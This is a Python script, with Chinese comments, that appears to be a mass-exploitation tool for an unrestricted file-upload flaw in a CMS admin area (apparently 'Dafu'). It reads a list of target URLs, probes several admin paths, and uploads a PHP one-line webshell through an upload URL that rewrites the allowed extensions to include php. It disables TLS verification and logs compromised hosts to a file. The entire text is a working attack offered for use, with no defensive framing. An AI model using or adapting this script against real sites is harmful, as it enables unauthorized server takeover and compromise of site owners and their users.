import requests import json import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
shell = '''这里写入一句话木马'''
class DafuGetShell(object):
def _init__(self,): pass
def Parse_url(self,arg): print(arg) ''' Url处理函数 ''' import sys if sys.version_info < (3, 0): import urlparse if arg.startswith("http"): result = urlparse.urlparse(arg) else: result = urlparse.urlparse('http://%s' % arg) else: from urllib.parse import urlparse if arg.startswith("http"): result = urlparse(arg) else: result = urlparse('http://%s' % arg) if result.port is None and result.scheme == 'https': port = 443 elif result.port is None and result.scheme == 'http': port = 80 else: port = result.port if port == 443: scheme = 'https' else: scheme = 'http' return result.scheme+"://"+result.hostname+":"+str(port)
def checkweak(self,url): boundary = '---------------------------18467633426500' data = [] data.append('--%s' % boundary) data.append('Content-Disposition: form-data; name="imgFile"; filename="1.php"') data.append('Content-Type: %s\r\n' % ' text/plain') data.append(shell) data.append('--%s--\r\n' % boundary) http_body = '\r\n'.join(data) headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Content-Type':'multipart/form-data; boundary=---------------------------18467633426500', } r = requests.post(url+"Uploads.upload.allowext.gif%7Cjpg%7Cjpeg%7Cphp%7Cpng%7Cbmp.size.2.do?dir=uploads", data=http_body,headers=headers,verify=False,timeout=5) ret = r.content if '"error":0' in str(ret) and 'uploads' in str(ret.lower()): return "[+] Getshell "+url+"\r"+ret
def audit(self,arg): adminpath = ['/admin/Admincenter/','/aaa/Admincenter/','/wwwroot/Admincenter/','/admin/','/Admincenter/',"/"] for i in adminpath: url = arg+i
try: weak = self.checkweak(url) if weak: print("找到漏洞地址:%s"%(weak)) file = open('0ok.txt','a') file.write("找到漏洞地址:%s\r\n"%(weak)) file.close() except Exception as error: print(error)
if __name__ == "__main__": try: if not sys.argv[1]: pass except: print("Use: python getdafu.py [文件名.txt]") exit() openfile=open(sys.argv[1]) for lines in openfile.readlines(): line = lines.strip() _ = DafuGetShell().audit(DafuGetShell().Parse_url(line))
|